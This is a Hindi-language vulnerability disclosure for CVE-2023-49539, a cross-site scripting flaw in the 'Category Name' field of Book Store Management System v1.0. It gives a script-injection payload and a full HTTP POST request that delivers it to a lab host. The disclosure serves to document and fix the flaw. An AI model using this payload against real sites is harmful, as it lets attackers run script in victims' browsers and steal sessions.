
Book Store Management System v1.0 - 'index.php/category' में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता - संवेदनशील फ़ील्ड: 'Category Name'
विवरण: Book Store Management System v1.0 में "/bsms_ci/index.php/category" में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता पाई गई। यह भेद्यता हमलावरों को "श्रेणी का नाम" फ़ील्ड में इंजेक्ट किए गए क्राफ्टेड पेलोड के माध्यम से मनमाने वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।
भेद्य उत्पाद संस्करण: Book Store Management System v1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 29/11/2023
पुष्टि की गई: 15/12/2023
CVE: CVE-2023-49539
परीक्षण किया गया: Windows
यह भेद्यता "/bsms_ci/index.php/category/" पृष्ठ पर मौजूद है। विशेष रूप से, श्रेणी बनाते/संपादित करते समय, 'श्रेणी का नाम' फ़ील्ड को कमजोर पाया गया है। हमलावर श्रेणी निर्माण/संपादन प्रक्रिया के दौरान "श्रेणी का नाम" फ़ील्ड में क्रॉस-साइट स्क्रिप्टिंग (XSS) पेलोड इंजेक्ट करके इस भेद्यता का शोषण कर सकते हैं।
<\td><script>alert(document.domain)</script>
POST /bsms_ci/index.php/category/category_update HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/bsms_ci/index.php/category
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; ci_session=72ruij3r4688s92v273ncnqjm150uvu8
Upgrade-Insecure-Requests: 1
category_code_lama=12&category_code=12&category_name=%3c%5ctd%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e&edit=Save
खोजकर्ता/क्रेडिट: Geraldo Alcântara